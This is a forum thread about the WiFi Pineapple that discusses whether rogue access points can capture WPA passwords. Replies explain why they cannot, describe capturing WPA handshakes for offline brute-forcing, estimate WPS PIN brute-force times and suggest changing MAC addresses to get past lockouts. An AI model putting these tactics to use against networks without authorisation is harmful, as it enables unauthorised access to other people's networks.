steve3333 Posted May 22, 2014 Share Posted May 22, 2014 Hi everybody, I upgraded my firmware 1.4.0 and its very nice thank you guys for that. Now that we can create an AP with WPA or WPA2 would it be possible to get the passwords that people are using to try to connect to it ? For example if you want to get the password for the AP "NETWORK" , you will create an AP named "NETWORK" on the pineapple with WPA encryption then jammed the real AP "NETWORK" hope for the target to try connect to the pineapple "NETWORK" with his password and then we will have it.... Im not sure if this is actualy possible but if it is ... could be usefull :) What do you guys think ? Quote Link to comment Share on other sites More sharing options...
Oli Posted May 22, 2014 Share Posted May 22, 2014 No, this is not possible. Quote Link to comment Share on other sites More sharing options...
steve3333 Posted May 22, 2014 Author Share Posted May 22, 2014 not possible with the actual firmware and tools we have ? or not possible ever ? and why not ? could we get around it ? Sorry but "No, this is not possible." is something that if we were blindly believing well we wouldnt be here ? right ? Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted May 22, 2014 Share Posted May 22, 2014 No, this is not possible. To elaborate on this short reply, it is not possible because this isn't how WPA works. The password is never actually transmitted. Instead, a four-way handshake is done to establish a connection. You could capture the WPA handshake using your WiFi Pineapple MKV and then bruteforce it on a powerful machine -- but this is simply bruteforcing. If you want to know more on the subject, I suggest you read up about WPA/WPA2 and the four-way handshake. Best Regards, Sebkinne Quote Link to comment Share on other sites More sharing options...
steve3333 Posted May 22, 2014 Author Share Posted May 22, 2014 Thank you i will , what would be more efficient then ? reaver or brute forcing the handshake ? Wouldnt it be worth it to look into it ? There isnt many ways to crack a WPA at least from what i know ? so maybe that could be worth it ? An infusions gettting the handshakes then send it to the big boy at home ? Quote Link to comment Share on other sites More sharing options...
cooper Posted May 22, 2014 Share Posted May 22, 2014 Start by reading the 'brute force attack' chapter of this Wikipedia article. You'd assume the PIN was sent from client to server in some way if the router can tell the client which half of the pin was wrong, but if Seb says otherwise I'm inclined to believe him. Can't really find a good quick (i.e. not the spec) description of this particular bit of protocol to prove it either way and I'm an utter noob when it comes to this sort of thing. What I can tell you is this: When you don't have a valid handshake, you need to do what the wikipedia article says. Due to general idiocy when it comes to the validation algorithm WPS's valid keyspace has gone from 10^8 to just 11000 possibilities. If the router shuts down access to WPS after X failed attempts for a duration of Y minutes, you can succesfully brute-force the router in 11000/(X*24*(60/Y)) days. Some common examples (rounding up): 1 failed attempt = 5 minute delay => 38.2 days 3 failed attempts = 5 minute delay => 12.8 days 3 failed attempts = 15 minute delay => 38.2 days By comparison, an unprotected WPS for which we'll assume it manages 1 PIN per second (i.e. SLOW) can be bruteforced like this in about an hour. Also note that the numbers given are your worst-case scenarios. Where you had to run through the ENTIRE keyspace. There's a good chance you won't need that much. Things to test for when trying this: Is WPS turned off completely, or does the MAC simply get blacklisted? In case of blacklisting, try until blacklisted, change MAC, continue. Quote Link to comment Share on other sites More sharing options...
Darren Kitchen Posted May 23, 2014 Share Posted May 23, 2014 This is why: It's actually rather elegant. Here's an old Hak5 episode on the topic: Quote Link to comment Share on other sites More sharing options...
fringes Posted May 26, 2014 Share Posted May 26, 2014 Here's an old Hak5 episode on the topic: That link didn't show up in my browser. How odd is that? Quote Link to comment Share on other sites More sharing options...
barry99705 Posted May 26, 2014 Share Posted May 26, 2014 That link didn't show up in my browser. How odd is that? It's a Chrome issue. Works just fine in internet exploder. Quote Link to comment Share on other sites More sharing options...
fringes Posted May 27, 2014 Share Posted May 27, 2014 Interesting. I don't use IE, but it showed up in Mantra, a Firefox derivative. It didn't show up for me in Chrome, Iceweasle, or Firefox though. Well, anyone that didn't see it has it now. Quote Link to comment Share on other sites More sharing options...
mod Posted April 10, 2015 Share Posted April 10, 2015 Hi seb and Darren. Once the handshake is collected on the pineapple. How do I transfer it to my PC for processing. Probably a silly question Quote Link to comment Share on other sites More sharing options...
mod Posted April 11, 2015 Share Posted April 11, 2015 Got it winscp Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.